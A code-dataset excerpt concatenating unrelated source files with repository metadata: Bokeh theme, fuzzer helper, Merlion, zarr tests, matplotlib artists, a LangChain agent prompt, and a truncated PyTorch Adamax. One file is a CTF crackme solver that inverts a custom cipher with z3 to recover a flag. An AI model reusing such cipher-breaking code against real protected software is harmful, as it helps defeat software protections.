470ed6dcf0ab20ead3d2865d376d152764bc551b
|
[
"BSD-3-Clause"
] |
permissive
|
bokeh/bokeh
|
ed1d81eb07d27d27c6710c9fec9114886047f528
|
310cb2cbeabc4c4b8180cbda566df16039737cdc
|
refs/heads/branch-3.3
| 2023-08-31T23:53:06.537061
| 2023-08-30T03:43:05
| 2023-08-30T03:43:05
| 3,834,332
| 17,174
| 5,251
|
BSD-3-Clause
| 2023-09-14T11:37:23
| 2012-03-26T15:40:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,382
|
py
|
_night_sky.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2023, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
json = {
"attrs": {
"Plot": {
"background_fill_color": "#2C001E",
"border_fill_color": "#15191C",
"outline_line_color": "#E0E0E0",
"outline_line_alpha": 0.25,
},
"Grid": {
"grid_line_color": "#E0E0E0",
"grid_line_alpha": 0.25,
},
"Axis": {
"major_tick_line_alpha": 0,
"major_tick_line_color": "#E0E0E0",
"minor_tick_line_alpha": 0,
"minor_tick_line_color": "#E0E0E0",
"axis_line_alpha": 0,
"axis_line_color": "#E0E0E0",
"major_label_text_color": "#E0E0E0",
"major_label_text_font": "Helvetica",
"major_label_text_font_size": "1.025em",
"axis_label_standoff": 10,
"axis_label_text_color": "#E0E0E0",
"axis_label_text_font": "Helvetica",
"axis_label_text_font_size": "1.25em",
"axis_label_text_font_style": "normal",
},
"Legend": {
"spacing": 8,
"glyph_width": 15,
"label_standoff": 8,
"label_text_color": "#E0E0E0",
"label_text_font": "Helvetica",
"label_text_font_size": "1.025em",
"border_line_alpha": 0,
"background_fill_alpha": 0.25,
"background_fill_color": "#2C001E",
},
"BaseColorBar": {
"title_text_color": "#E0E0E0",
"title_text_font": "Helvetica",
"title_text_font_size": "1.025em",
"title_text_font_style": "normal",
"major_label_text_color": "#E0E0E0",
"major_label_text_font": "Helvetica",
"major_label_text_font_size": "1.025em",
"background_fill_color": "#15191C",
"major_tick_line_alpha": 0,
"bar_line_alpha": 0,
},
"Title": {
"text_color": "#E0E0E0",
"text_font": "Helvetica",
"text_font_size": "1.15em",
},
},
}
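# Hedged usage sketch (not part of the original theme module): a theme dict such
# as the one above is normally applied to a Bokeh document via Theme(json=...).
# The plot below is purely illustrative.
#
# from bokeh.plotting import figure, curdoc
# from bokeh.themes import Theme
#
# curdoc().theme = Theme(json=json)
# p = figure(title="night sky themed plot")
# p.line([1, 2, 3], [4, 6, 5])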
|
6342792b9fd00a2cdf78aadf6395c2886a45b9fb
|
26bbcfdb811f7df13f7b5a95ba551da7adac4e9b
|
/src/certfuzz/scoring/multiarmed_bandit/round_robin_bandit.py
|
68da68ce5f1c0c85df89501f725e70daf11b8398
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
CERTCC/certfuzz
|
080c3a5448a39d02049253fad96498ba50191586
|
892dae8676535b0ae5b77eea95ffbc21e9e1c959
|
refs/heads/develop
| 2022-11-11T06:12:09.032184
| 2020-06-10T19:57:26
| 2020-06-10T19:57:26
| 20,684,363
| 161
| 25
|
NOASSERTION
| 2023-05-10T14:27:00
| 2014-06-10T12:29:53
|
Python
|
UTF-8
|
Python
| false
| false
| 362
|
py
|
round_robin_bandit.py
|
'''
Created on Jan 10, 2014
@author: adh
'''
import itertools
from certfuzz.scoring.multiarmed_bandit.multiarmed_bandit_base import MultiArmedBanditBase
class RoundRobinMultiArmedBandit(MultiArmedBanditBase):
def __iter__(self):
'''
Implements a simple round robin iterator
'''
return itertools.cycle(self.things.values())
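# Hedged usage sketch (not part of the original module): `things` is assumed to
# be the name -> payload mapping maintained by MultiArmedBanditBase; the payloads
# here are hypothetical.
#
# bandit = RoundRobinMultiArmedBandit()
# bandit.things = {"a": 1, "b": 2, "c": 3}
# it = iter(bandit)
# [next(it) for _ in range(5)]  # -> [1, 2, 3, 1, 2] (cycles in insertion order)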
|
a9f7a2806bc76b7f11976affe1b8d273c897a0cd
|
e2b9f2354c36bd1edfa141d29f60c13ea176c0fe
|
/2017/bostonkeyparty/qtcrackme.py
|
283ce4a8265db98d95a386ddfde7736ada00e748
|
[] |
no_license
|
Jinmo/ctfs
|
236d2c9c5a49d500e80ece4631a22c7fb32c3c3f
|
d225baef7942250a5ff15a3f2a9b7ad8501c7566
|
refs/heads/master
| 2021-07-24T15:17:05.489163
| 2021-07-05T16:05:15
| 2021-07-05T16:05:15
| 68,125,231
| 162
| 26
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,361
|
py
|
qtcrackme.py
|
import numpy as np
from numpy.linalg import inv as inv_matrix # really???
from z3 import *
ciphertext = [342868586L, 276196100L, 719703660L, 771095780L, 607388058L, 526903709L, 1078504063L, 1277609804L, 380802638L, 328226818L, 869243743L, 752195599L, 503103844L, 346660259L, 739251810L, 732552923L]
key = [37087L, 28860L, 61271L, 23190L, 53230L, 21769L, 32974L, 3360L, 57679L, 1806L, 42054L, 12230L, 60656L, 21333L, 30763L, 25687L]
key2 = [4992L, 9722L, 3242L, 226L, 1252L, 22234L, 6753L, 4671L, 9993L, 259L, 3591L, 192L, 8245L, 5425L, 32L, 3527L]
key3 = [2282688058L, 383276719L, 93319952L, 3639096956L]
key3 = [key3[0] | (key3[1] << 32), key3[2] | (key3[3] << 32)]
rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
concat = lambda x: sum([a << ((len(x) - b - 1) * 16) for a, b in zip(x, range(0, len(x)))])
mask = 2 ** 64 - 1
mask16 = 2 ** 16 - 1
def minor(matrix,i):
"""Returns the Minor M_0i of matrix"""
minor = matrix
del minor[0] #Delete first row
for b in list(range(len(matrix))): #Delete column i
del minor[b][i]
return minor
def det(A):
"""Recursive function to find determinant"""
if len(A) == 1: #Base case on which recursion ends
return A[0][0]
else:
determinant = 0
for x in list(range(len(A))): #Iterates along first row finding cofactors
print("A:", A)
determinant += A[0][x] * (-1)**(2+x) * det(minor(A,x)) #Adds successive elements times their cofactors
print("determinant:", determinant)
return determinant
def encrypt(input):
global concat, key3
s = [a ^ b for a, b in zip(input, key)]
s = [concat(s[i:i+4]) for i in range(0, len(s), 4)]
print map(hex, s)
for i in range(2):
key3_ = list(key3)
a = s[i*2]
b = s[i*2+1]
for j in range(32):
a = (key3_[1] ^ (ror(a, 8, 64) + b)) & mask
b = (rol(b, 3, 64) ^ a) & mask
# keystream
key3_[0] = (j ^ (ror(key3_[0], 8, 64) + key3_[1])) & mask
key3_[1] = (rol(key3_[1], 3, 64) ^ key3_[0]) & mask
print hex(a), hex(b)
s[i*2], s[i*2+1] = a, b
# print map(hex, s)
s2 = []
for c in s:
s2.append((c >> 48) & mask16)
s2.append((c >> 32) & mask16)
s2.append((c >> 16) & mask16)
s2.append(c & mask16)
# print map(hex, s2)
s3 = [None] * 16
for i in range(4):
for j in range(4):
s3[j*4+i] = key2[j*4+0] * s2[i] + key2[j*4+1] * s2[i+4] + key2[j*4+2] * s2[i+8] + key2[j*4+3] * s2[i+12]
if s3[j*4+i] > 2**32:
print 'wtf'
exit()
# print map(hex, s3)
# print map(hex, ciphertext)
return s3
def decrypt(input):
global concat, key3, key2, mask
s2 = [Int('s2[%d]' % i) for i in range(16)]
s3 = [None] * 16
for i in range(4):
for j in range(4):
s3[j*4+i] = key2[j*4+0] * s2[i] + key2[j*4+1] * s2[i+4] + key2[j*4+2] * s2[i+8] + key2[j*4+3] * s2[i+12]
solver = Solver()
for i in range(16):
solver.add(s3[i] == input[i])
if solver.check() == unsat:
print 'wtf'
exit()
s2 = [solver.model()[s2[i]] for i in range(16)]
s2 = map(lambda x: x.as_long(), s2)
print map(hex, s2)
s = [concat(s2[i:i+4]) for i in range(0, len(s2), 4)]
for i in range(2):
key3_ = list(key3)
keys = []
for j in range(32):
# keystream
keys.append([key3_[0], key3_[1]])
key3_[0] = (j ^ (ror(key3_[0], 8, 64) + key3_[1])) & mask
key3_[1] = (rol(key3_[1], 3, 64) ^ key3_[0]) & mask
a = s[i*2]
b = s[i*2+1]
for j in range(32):
print hex(a), hex(b)
b = (ror(b ^ a, 3, 64)) & mask
a = ((rol((keys[-1 - j][1] ^ a) - b, 8, 64))) & mask
s[i*2], s[i*2+1] = a, b
plaintext = []
for c in s:
plaintext.append((c >> 48) & mask16)
plaintext.append((c >> 32) & mask16)
plaintext.append((c >> 16) & mask16)
plaintext.append(c & mask16)
plaintext = [a ^ b for a, b in zip(plaintext, key)]
print plaintext
# print map(hex, s)
mask = 2 ** 64 - 1
# print map(hex, s3)
# print map(hex, ciphertext)
return str(bytearray(plaintext))
assert concat([1, 2, 3, 4, 5, 6, 7, 8]) == 0x10002000300040005000600070008
input = 'JINMO123JINMO123'
input = bytearray(input)
decrypt(encrypt(input))
print '=' * 500
print decrypt(ciphertext)
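# Hedged sanity checks (not part of the original solver): tiny 4-bit examples of
# the rotate helpers defined above, matching the inline "0b1001 --> 0b1100"
# comment for ror.
assert rol(0b1001, 1, 4) == 0b0011
assert ror(0b1001, 1, 4) == 0b1100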
|
12e27fe20d6953ebabeced7bf665b59b0d34740e
|
091e40b7cc9ac83d30e860603b4c8cdc785b77ee
|
/merlion/post_process/factory.py
|
e2216ddc8b58d4497bc59e7fa0e179475b918418
|
[
"BSD-3-Clause"
] |
permissive
|
salesforce/Merlion
|
b7a75326cd05883285f25ff856c89dc80570e602
|
01c3fc3406ebf19798cedcddbe829ae5339e1424
|
refs/heads/main
| 2023-04-10T02:25:43.959522
| 2023-03-22T18:39:54
| 2023-03-22T18:39:54
| 390,401,992
| 2,905
| 268
|
BSD-3-Clause
| 2023-03-22T18:39:56
| 2021-07-28T15:30:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,283
|
py
|
factory.py
|
#
# Copyright (c) 2023 salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
"""
Contains the `PostRuleFactory`.
"""
from typing import Type
from merlion.post_process.base import PostRuleBase
from merlion.utils import dynamic_import
import_alias = dict(
Threshold="merlion.post_process.threshold:Threshold",
AggregateAlarms="merlion.post_process.threshold:AggregateAlarms",
AdaptiveThreshold="merlion.post_process.threshold:AdaptiveThreshold",
AdaptiveAggregateAlarms="merlion.post_process.threshold:AdaptiveAggregateAlarms",
AnomScoreCalibrator="merlion.post_process.calibrate:AnomScoreCalibrator",
PostRuleSequence="merlion.post_process.sequence:PostRuleSequence",
)
class PostRuleFactory(object):
@classmethod
def get_post_rule_class(cls, name: str) -> Type[PostRuleBase]:
return dynamic_import(name, import_alias)
@classmethod
def create(cls, name: str, **kwargs) -> PostRuleBase:
"""
Uses the given ``kwargs`` to create a post-rule of the given name
"""
post_rule_class = cls.get_post_rule_class(name)
return post_rule_class.from_dict(kwargs)
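# Hedged usage sketch (not part of the original module): the rule name must be a
# key of `import_alias` above; the keyword arguments are hypothetical and depend
# on the configuration of the chosen post-rule.
#
# threshold_cls = PostRuleFactory.get_post_rule_class("Threshold")
# post_rule = PostRuleFactory.create("AggregateAlarms", alm_threshold=3.0)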
|
6326306f769cfb88f5f70284d6252a2b664875b0
|
7fe5cb99188c7270f726b1145fc356fd2922df9d
|
/geoapi/src/main/python/opengis/geometry/__init__.py
|
ade90e843bf60fe43c22c6f6e91d6e4fc6b8e60d
|
[
"Apache-2.0"
] |
permissive
|
opengeospatial/geoapi
|
eedcf2d3259284fc614f7fa132c77fcef67d7ecc
|
7a0872373e4ad70039b5ec9be2f086081fb5c746
|
refs/heads/master
| 2023-08-17T23:37:23.874101
| 2023-08-10T20:02:27
| 2023-08-10T20:02:27
| 27,879,839
| 111
| 33
|
NOASSERTION
| 2021-06-28T08:08:29
| 2014-12-11T16:13:54
|
Java
|
UTF-8
|
Python
| false
| false
| 90
|
py
|
__init__.py
|
"""
Geometry structures derived from the ISO 19107 international standard.
"""
|
9a17f3f050fa72393e63b9cda4903819e6d37e3c
|
57c0a57269dfc516c7f46468940efb62cb863af4
|
/langchain/agents/conversational/prompt.py
|
15268a760834452eb3ff990ca6548a80788271d3
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
microsoft/MM-REACT
|
e67a843faadf4752f5e9d0e2dbf0c80068dbd288
|
b8f29af7f3c24cf3a4554bebfa2053064467fbdb
|
refs/heads/main
| 2023-08-31T03:01:42.246514
| 2023-05-12T20:43:11
| 2023-05-12T20:43:11
| 614,230,777
| 705
| 57
|
MIT
| 2023-08-30T00:04:13
| 2023-03-15T06:56:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,859
|
py
|
prompt.py
|
# flake8: noqa
PREFIX = """Assistant is a large language model trained by OpenAI.
Assistant is designed to be able to assist with a wide range of tasks, from answering simple questions to providing in-depth explanations and discussions on a wide range of topics. As a language model, Assistant is able to generate human-like text based on the input it receives, allowing it to engage in natural-sounding conversations and provide responses that are coherent and relevant to the topic at hand.
Assistant is constantly learning and improving, and its capabilities are constantly evolving. It is able to process and understand large amounts of text, and can use this knowledge to provide accurate and informative responses to a wide range of questions. Additionally, Assistant is able to generate its own text based on the input it receives, allowing it to engage in discussions and provide explanations and descriptions on a wide range of topics.
Overall, Assistant is a powerful tool that can help with a wide range of tasks and provide valuable insights and information on a wide range of topics. Whether you need help with a specific question or just want to have a conversation about a particular topic, Assistant is here to assist.
TOOLS:
------
Assistant has access to the following tools:"""
FORMAT_INSTRUCTIONS = """To use a tool, please use the following format:
```
Thought: Do I need to use a tool? Yes
Action: the action to take, should be one of [{tool_names}]
Action Input: the input to the action
Observation: the result of the action
```
When you have a response to say to the Human, or if you do not need to use a tool, you MUST use the format:
```
Thought: Do I need to use a tool? No
{ai_prefix}: [your response here]
```"""
SUFFIX = """Begin!
Previous conversation history:
{chat_history}
New input: {input}
{agent_scratchpad}"""
|
da16793958b33ebd05ec7428b86edb5da64fe2ca
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/matplotlib/py2/mpl_toolkits/axes_grid1/anchored_artists.py
|
5b492858e8da5f78117d773190635036f3af80ce
|
[
"Apache-2.0"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 13,214
|
py
|
anchored_artists.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
from matplotlib import docstring
from matplotlib.offsetbox import (AnchoredOffsetbox, AuxTransformBox,
DrawingArea, TextArea, VPacker)
from matplotlib.patches import Rectangle, Ellipse
__all__ = ['AnchoredDrawingArea', 'AnchoredAuxTransformBox',
'AnchoredEllipse', 'AnchoredSizeBar']
class AnchoredDrawingArea(AnchoredOffsetbox):
@docstring.dedent
def __init__(self, width, height, xdescent, ydescent,
loc, pad=0.4, borderpad=0.5, prop=None, frameon=True,
**kwargs):
"""
An anchored container with a fixed size and fillable DrawingArea.
Artists added to the *drawing_area* will have their coordinates
interpreted as pixels. Any transformations set on the artists will be
overridden.
Parameters
----------
width, height : int or float
width and height of the container, in pixels.
xdescent, ydescent : int or float
descent of the container in the x- and y- direction, in pixels.
loc : int
Location of this artist. Valid location codes are::
'upper right' : 1,
'upper left' : 2,
'lower left' : 3,
'lower right' : 4,
'right' : 5,
'center left' : 6,
'center right' : 7,
'lower center' : 8,
'upper center' : 9,
'center' : 10
pad : int or float, optional
Padding around the child objects, in fraction of the font
size. Defaults to 0.4.
borderpad : int or float, optional
Border padding, in fraction of the font size.
Defaults to 0.5.
prop : `matplotlib.font_manager.FontProperties`, optional
Font property used as a reference for paddings.
frameon : bool, optional
            If True, draw a box around this artist. Defaults to True.
**kwargs :
Keyworded arguments to pass to
:class:`matplotlib.offsetbox.AnchoredOffsetbox`.
Attributes
----------
drawing_area : `matplotlib.offsetbox.DrawingArea`
A container for artists to display.
Examples
--------
To display blue and red circles of different sizes in the upper right
of an axes *ax*:
>>> ada = AnchoredDrawingArea(20, 20, 0, 0, loc=1, frameon=False)
>>> ada.drawing_area.add_artist(Circle((10, 10), 10, fc="b"))
>>> ada.drawing_area.add_artist(Circle((30, 10), 5, fc="r"))
>>> ax.add_artist(ada)
"""
self.da = DrawingArea(width, height, xdescent, ydescent)
self.drawing_area = self.da
super(AnchoredDrawingArea, self).__init__(
loc, pad=pad, borderpad=borderpad, child=self.da, prop=None,
frameon=frameon, **kwargs
)
class AnchoredAuxTransformBox(AnchoredOffsetbox):
@docstring.dedent
def __init__(self, transform, loc,
pad=0.4, borderpad=0.5, prop=None, frameon=True, **kwargs):
"""
An anchored container with transformed coordinates.
Artists added to the *drawing_area* are scaled according to the
coordinates of the transformation used. The dimensions of this artist
will scale to contain the artists added.
Parameters
----------
transform : `matplotlib.transforms.Transform`
The transformation object for the coordinate system in use, i.e.,
:attr:`matplotlib.axes.Axes.transData`.
loc : int
Location of this artist. Valid location codes are::
'upper right' : 1,
'upper left' : 2,
'lower left' : 3,
'lower right' : 4,
'right' : 5,
'center left' : 6,
'center right' : 7,
'lower center' : 8,
'upper center' : 9,
'center' : 10
pad : int or float, optional
Padding around the child objects, in fraction of the font
size. Defaults to 0.4.
borderpad : int or float, optional
Border padding, in fraction of the font size.
Defaults to 0.5.
prop : `matplotlib.font_manager.FontProperties`, optional
Font property used as a reference for paddings.
frameon : bool, optional
            If True, draw a box around this artist. Defaults to True.
**kwargs :
Keyworded arguments to pass to
:class:`matplotlib.offsetbox.AnchoredOffsetbox`.
Attributes
----------
drawing_area : `matplotlib.offsetbox.AuxTransformBox`
A container for artists to display.
Examples
--------
To display an ellipse in the upper left, with a width of 0.1 and
height of 0.4 in data coordinates:
>>> box = AnchoredAuxTransformBox(ax.transData, loc=2)
>>> el = Ellipse((0,0), width=0.1, height=0.4, angle=30)
>>> box.drawing_area.add_artist(el)
>>> ax.add_artist(box)
"""
self.drawing_area = AuxTransformBox(transform)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad,
child=self.drawing_area,
prop=prop,
frameon=frameon,
**kwargs)
class AnchoredEllipse(AnchoredOffsetbox):
@docstring.dedent
def __init__(self, transform, width, height, angle, loc,
pad=0.1, borderpad=0.1, prop=None, frameon=True, **kwargs):
"""
Draw an anchored ellipse of a given size.
Parameters
----------
transform : `matplotlib.transforms.Transform`
The transformation object for the coordinate system in use, i.e.,
:attr:`matplotlib.axes.Axes.transData`.
width, height : int or float
Width and height of the ellipse, given in coordinates of
*transform*.
angle : int or float
Rotation of the ellipse, in degrees, anti-clockwise.
loc : int
Location of this size bar. Valid location codes are::
'upper right' : 1,
'upper left' : 2,
'lower left' : 3,
'lower right' : 4,
'right' : 5,
'center left' : 6,
'center right' : 7,
'lower center' : 8,
'upper center' : 9,
'center' : 10
pad : int or float, optional
Padding around the ellipse, in fraction of the font size. Defaults
to 0.1.
borderpad : int or float, optional
Border padding, in fraction of the font size. Defaults to 0.1.
frameon : bool, optional
If True, draw a box around the ellipse. Defaults to True.
prop : `matplotlib.font_manager.FontProperties`, optional
Font property used as a reference for paddings.
**kwargs :
Keyworded arguments to pass to
:class:`matplotlib.offsetbox.AnchoredOffsetbox`.
Attributes
----------
ellipse : `matplotlib.patches.Ellipse`
Ellipse patch drawn.
"""
self._box = AuxTransformBox(transform)
self.ellipse = Ellipse((0, 0), width, height, angle)
self._box.add_artist(self.ellipse)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad,
child=self._box,
prop=prop,
frameon=frameon, **kwargs)
class AnchoredSizeBar(AnchoredOffsetbox):
@docstring.dedent
def __init__(self, transform, size, label, loc,
pad=0.1, borderpad=0.1, sep=2,
frameon=True, size_vertical=0, color='black',
label_top=False, fontproperties=None, fill_bar=None,
**kwargs):
"""
Draw a horizontal scale bar with a center-aligned label underneath.
Parameters
----------
transform : `matplotlib.transforms.Transform`
The transformation object for the coordinate system in use, i.e.,
:attr:`matplotlib.axes.Axes.transData`.
size : int or float
Horizontal length of the size bar, given in coordinates of
*transform*.
label : str
Label to display.
loc : int
Location of this size bar. Valid location codes are::
'upper right' : 1,
'upper left' : 2,
'lower left' : 3,
'lower right' : 4,
'right' : 5,
'center left' : 6,
'center right' : 7,
'lower center' : 8,
'upper center' : 9,
'center' : 10
pad : int or float, optional
Padding around the label and size bar, in fraction of the font
size. Defaults to 0.1.
borderpad : int or float, optional
Border padding, in fraction of the font size.
Defaults to 0.1.
sep : int or float, optional
Separation between the label and the size bar, in points.
Defaults to 2.
frameon : bool, optional
If True, draw a box around the horizontal bar and label.
Defaults to True.
size_vertical : int or float, optional
Vertical length of the size bar, given in coordinates of
*transform*. Defaults to 0.
color : str, optional
Color for the size bar and label.
Defaults to black.
label_top : bool, optional
If True, the label will be over the size bar.
Defaults to False.
fontproperties : `matplotlib.font_manager.FontProperties`, optional
Font properties for the label text.
fill_bar : bool, optional
            If True and if size_vertical is nonzero, the size bar will
            be filled in with the color specified for the size bar.
Defaults to True if `size_vertical` is greater than
zero and False otherwise.
**kwargs :
Keyworded arguments to pass to
:class:`matplotlib.offsetbox.AnchoredOffsetbox`.
Attributes
----------
size_bar : `matplotlib.offsetbox.AuxTransformBox`
Container for the size bar.
txt_label : `matplotlib.offsetbox.TextArea`
Container for the label of the size bar.
Notes
-----
        If *prop* is passed as a keyword argument, but *fontproperties* is
        not, then *prop* is assumed to be the intended *fontproperties*.
Using both *prop* and *fontproperties* is not supported.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> import numpy as np
>>> from mpl_toolkits.axes_grid1.anchored_artists import \
AnchoredSizeBar
>>> fig, ax = plt.subplots()
>>> ax.imshow(np.random.random((10,10)))
>>> bar = AnchoredSizeBar(ax.transData, 3, '3 data units', 4)
>>> ax.add_artist(bar)
>>> fig.show()
Using all the optional parameters
>>> import matplotlib.font_manager as fm
>>> fontprops = fm.FontProperties(size=14, family='monospace')
>>> bar = AnchoredSizeBar(ax.transData, 3, '3 units', 4, pad=0.5, \
sep=5, borderpad=0.5, frameon=False, \
size_vertical=0.5, color='white', \
fontproperties=fontprops)
"""
if fill_bar is None:
fill_bar = size_vertical > 0
self.size_bar = AuxTransformBox(transform)
self.size_bar.add_artist(Rectangle((0, 0), size, size_vertical,
fill=fill_bar, facecolor=color,
edgecolor=color))
if fontproperties is None and 'prop' in kwargs:
fontproperties = kwargs.pop('prop')
if fontproperties is None:
textprops = {'color': color}
else:
textprops = {'color': color, 'fontproperties': fontproperties}
self.txt_label = TextArea(
label,
minimumdescent=False,
textprops=textprops)
if label_top:
_box_children = [self.txt_label, self.size_bar]
else:
_box_children = [self.size_bar, self.txt_label]
self._box = VPacker(children=_box_children,
align="center",
pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad,
child=self._box,
prop=fontproperties,
frameon=frameon, **kwargs)
|
8adfb0ebc87b8cd572bdd7cc5adff80d6cac0b19
|
c5f0246cc8601aeedae2c63ebe7e82406ea3fc7f
|
/zarr/tests/test_dim_separator.py
|
987852dfd00481aa7ff892df4d1847d3c9b6aa53
|
[
"MIT"
] |
permissive
|
zarr-developers/zarr-python
|
56d2f3633c8eeb415ee81076ec942160d7839ca2
|
4944e66cd847a6ab5ec3a70c2b7bc0973f707bd6
|
refs/heads/main
| 2023-09-01T15:02:16.892360
| 2023-08-28T07:09:20
| 2023-08-28T07:09:20
| 48,049,137
| 908
| 200
|
MIT
| 2023-09-14T04:36:44
| 2015-12-15T14:49:40
|
Python
|
UTF-8
|
Python
| false
| false
| 4,219
|
py
|
test_dim_separator.py
|
import pathlib
import pytest
from numpy.testing import assert_array_equal
from functools import partial
import zarr
from zarr.core import Array
from zarr.storage import DirectoryStore, NestedDirectoryStore, FSStore
from zarr.tests.util import have_fsspec
needs_fsspec = pytest.mark.skipif(not have_fsspec, reason="needs fsspec")
@pytest.fixture(
params=(
"static_flat",
"static_flat_legacy",
"static_nested",
"static_nested_legacy",
"directory_nested",
"directory_flat",
"directory_default",
"nesteddirectory_nested",
"nesteddirectory_default",
pytest.param("fs_nested", marks=needs_fsspec),
pytest.param("fs_flat", marks=needs_fsspec),
pytest.param("fs_default", marks=needs_fsspec),
)
)
def dataset(tmpdir, request):
"""
Generate a variety of different Zarrs using
different store implementations as well as
different dimension_separator arguments.
"""
loc = tmpdir.join("dim_sep_test.zarr")
which = request.param
kwargs = {}
if which.startswith("static"):
project_root = pathlib.Path(zarr.__file__).resolve().parent.parent
suffix = which[len("static_") :]
static = project_root / "fixture" / suffix
if not static.exists(): # pragma: no cover
if "nested" in which:
# No way to reproduce the nested_legacy file via code
generator = NestedDirectoryStore
else:
if "legacy" in suffix:
# No dimension_separator metadata included
generator = DirectoryStore
else:
# Explicit dimension_separator metadata included
generator = partial(DirectoryStore, dimension_separator=".")
# store the data - should be one-time operation
s = generator(str(static))
a = zarr.open(store=s, mode="w", shape=(2, 2), dtype="<i8")
a[:] = [[1, 2], [3, 4]]
return str(static)
if which.startswith("directory"):
store_class = DirectoryStore
elif which.startswith("nested"):
store_class = NestedDirectoryStore
else:
store_class = FSStore
kwargs["mode"] = "w"
kwargs["auto_mkdir"] = True
if which.endswith("nested"):
kwargs["dimension_separator"] = "/"
elif which.endswith("flat"):
kwargs["dimension_separator"] = "."
store = store_class(str(loc), **kwargs)
zarr.creation.array(store=store, data=[[1, 2], [3, 4]])
return str(loc)
def verify(array, expect_failure=False):
try:
assert_array_equal(array[:], [[1, 2], [3, 4]])
except AssertionError:
if expect_failure:
pytest.xfail()
else:
raise # pragma: no cover
def test_open(dataset):
"""
Use zarr.open to open the dataset fixture. Legacy nested datasets
without the dimension_separator metadata are not expected to be
openable.
"""
failure = "nested_legacy" in dataset
verify(zarr.open(dataset, "r"), failure)
@needs_fsspec
def test_fsstore(dataset):
"""
Use FSStore to open the dataset fixture. Legacy nested datasets
without the dimension_separator metadata are not expected to be
openable.
"""
failure = "nested_legacy" in dataset
verify(Array(store=FSStore(dataset)), failure)
def test_directory(dataset):
"""
Use DirectoryStore to open the dataset fixture. Legacy nested datasets
without the dimension_separator metadata are not expected to be
openable.
"""
failure = "nested_legacy" in dataset
verify(zarr.Array(store=DirectoryStore(dataset)), failure)
def test_nested(dataset):
"""
Use NestedDirectoryStore to open the dataset fixture. This is the only
method that is expected to successfully open legacy nested datasets
    without the dimension_separator metadata. However, for non-nested
datasets without any metadata, NestedDirectoryStore will fail.
"""
failure = "flat_legacy" in dataset or "directory_default" in dataset or "fs_default" in dataset
verify(Array(store=NestedDirectoryStore(dataset)), failure)
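# Hedged illustration (not part of the original test module) of what
# dimension_separator changes on disk: nested stores write chunk keys such as
# "0/0", flat stores write "0.0". The path below is hypothetical.
#
# store = DirectoryStore("/tmp/example.zarr", dimension_separator="/")
# zarr.creation.array(store=store, data=[[1, 2], [3, 4]], chunks=(1, 1))
# # chunk data now lives under nested keys like "0/0", "0/1", "1/0", "1/1"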
|
bada6e9a2aad3aaa38f27c33af7162653ca34595
|
e0cfa3707e632da3d7e0f1aa5882927a64d2872a
|
/test/e2e/pageobjects/preview_page.py
|
7173a982a17cdf540bd6d8b5e4a39b1d6ff04d12
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
supakeen/pinnwand
|
055b50ac5cab2f6408e2d97c54ae4df3a56a8051
|
644c7ade47c4682e9aeb7495700577ea89443f23
|
refs/heads/master
| 2023-08-25T03:25:27.535971
| 2023-08-24T07:19:46
| 2023-08-24T10:33:24
| 171,712,839
| 146
| 34
|
MIT
| 2023-09-06T18:38:19
| 2019-02-20T16:52:16
|
Python
|
UTF-8
|
Python
| false
| false
| 516
|
py
|
preview_page.py
|
import logging
from test.e2e.pageobjects.base_page import BasePage
from playwright.sync_api import Page, expect
log = logging.getLogger(__name__)
class PreviewPage(BasePage):
def __init__(self, page: Page) -> None:
super().__init__(page, page.locator("pre"), "Preview Page")
self.page = page
# Expectations
def should_have_content(self, content):
expect(
self.page_locator,
f"Content of {self.page_name} was incorrect",
).to_have_text(content)
|
c24686ed7463457769a6178a7ad44a4d20199953
|
afd2087e80478010d9df66e78280f75e1ff17d45
|
/torch/optim/adamax.py
|
f8d1fb0178fdae893710f98d08164b5f5e0cc7f3
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] |
permissive
|
pytorch/pytorch
|
7521ac50c47d18b916ae47a6592c4646c2cb69b5
|
a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4
|
refs/heads/main
| 2023-08-03T05:05:02.822937
| 2023-08-03T00:40:33
| 2023-08-03T04:14:52
| 65,600,975
| 77,092
| 24,610
|
NOASSERTION
| 2023-09-14T21:58:39
| 2016-08-13T05:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 12,403
|
py
|
adamax.py
|
import torch
from torch import Tensor
from .optimizer import (Optimizer, _use_grad_for_differentiable, _get_value, _stack_if_compiling,
_default_to_fused_or_foreach, _differentiable_doc, _maximize_doc, _foreach_doc)
from typing import List, Optional
__all__ = ["Adamax", "adamax"]
class Adamax(Optimizer):
def __init__(
self,
params,
